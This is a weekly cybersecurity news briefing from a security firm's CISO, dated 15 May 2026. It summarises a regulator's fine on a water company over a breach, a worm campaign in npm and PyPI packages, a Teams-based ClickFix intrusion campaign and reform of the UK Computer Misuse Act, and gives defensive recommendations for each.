Weekly Cyber Update: 15 May 2026

The Cyber Threat Intelligence Briefing is a weekly round-up of the latest cybersecurity news, trends and indicators, curated by our CISO, Nick Harris. Here’s our pick of the top stories, and why you should care.

---

ICO fines South Staffordshire Water £1m Over Security Failings

The Information Commisioner’s Office (ICO) has fined South Staffordshire Water and its parent company £963,900 following a two-year cyber-attack which led to the compromise of personal information belonging to current and former customers and employees. After a successful phishing attack in 2020, which resulted in the installation of a remote access Trojan (RAT), the threat actor went silent. However, they re-emerged in 2022, using a domain administrator account and the remote desktop protocol to access 20 endpoints. The breach was only discovered when the exfiltration of 4.1TB of data set off alarms. The data of 633,887 individuals, including bank account numbers and sort codes, ended up on the dark web.

Why it matters

The case shows that the regulator is prepared to punish poor security posture that results in a significant data breach. The water company was found to have failed on vulnerability management, patching, monitoring (just 5% of the environment was covered), and access policy.

Assured’s recommended action

Don’t make the same mistakes as South Staffordshire Water. Enforce least-privilege access controls. Deploy adequate logging and monitoring controls across the entire environment and ensure alerts are acted upon. Make sure all systems are patched and supported. And conduct regular internal and external security scans.

---

New Shai-Hulud supply chain campaign targets developers

Researchers have spotted a new Shai-Hulud worm campaign which has already compromised hundreds of npm and PyPI packages with infostealing malware. Attributed to TeamPCP, the campaign began with the compromise of TanStack and Mistral AI packages but quickly spread to other projects including Guardrails AI, UiPath and OpenSearch. According to TanStack, the attackers chained three techniques: a risky ‘pull_request-target’ workflow, GitHub Actions cache poisoning, and runtime memory extraction of an OIDC token from the GitHub Actions runner process.

Why it matters

Most organisations don’t have visibility into what open source packages they’re running, or whether they’ve been tampered with. The attackers hijacked legitimate CI/CD pipelines with SLSA ‘trust’ baked in, meaning security tools would not have caught the malicious packages. The campaign uses a Session P2P network for data exfiltration to further complicate detection and takedown efforts. And the malware writes itself into IDE hooks for persistence even after the malicious package has been deleted. It spreads like a worm into other projects maintained by targeted developers. Access to developer secrets could enable attackers to hijack cloud infrastructure and gain internal network access.

Assured’s recommended action

Audit internal projects for compromised TanStack, Mistral AI, Guardrails AI, UiPath, Bitwarden CLI, and OpenSearch versions. Verify lockfiles, and review CI/CD pipeline permissions. Check for persistence in IDE configuration directories and quarantine impacted machines. Assume all secrets are compromised and rotate immediately.

---

Initial access broker takes minutes to access networks via Teams

An initial access broker (IAB) has been observed socially engineering victims via Microsoft Teams, in attacks that can take just five minutes to achieve full network access. ReliaQuest said the Chinese-nexus KongTuke uses ClickFix techniques to trick users into pasting PowerShell commands that deliver the ModeloRAT malware. CVE-2023-36036 – a Windows kernel vulnerability patched in late 2023 – is exploited for privilege escalation. A fake lock screen harvests the user’s credentials when they “re-authenticate”. Full domain compromise follows. The campaign has been active since at least April 2026, and KongTuke has used at least five Microsoft 365 tenants to evade detection.

Why it matters

Teams is an increasingly popular vector for social engineering of employees, and has been previously observed in ClickFix attacks using deepfakes across multiple campaigns targeting open source maintainers, as well as an Iranian APT campaign. Threat actors typically reach out to individuals impersonating IT staff. This, combined with the trust users and security teams have in Microsoft Teams, can improve their chances of success. By default, many Teams deployments allow external tenants to send chat requests to employees. Most SIEM rules were written for email-borne threats.

Assured’s recommended action

Restrict Teams external access to allow-listed domains, alert on Teams spawning PowerShell or remote management tools, monitor for Quick Assist execution followed by outbound connections, and patch CVE-2023-36036.

---

Computer Misuse Act set for long-overdue overhaul

The Computer Misuse Act (CMA) 1990 is set to be updated as part of a new National Security Bill, according to an announcement in the King’s Speech on Wednesday. The CMA was written before the web even existed in its current form. It provides no protection for security professionals running legitimate pen tests or responsibly disclosing vulnerabilities. The update will correct that.

Why it matters

This matters for organisations that rely on responsible disclosure programmes, external red teaming, or contracted penetration testing of third-party systems.

Assured’s recommended action

Consider using the upcoming reform to argue at a board level for creating a formal vulnerability disclosure programme. Review existing pen testing and threat hunting programmes and ensure they are documented as “authorised activities” and aligned with the “public interest” defence criteria in the new law.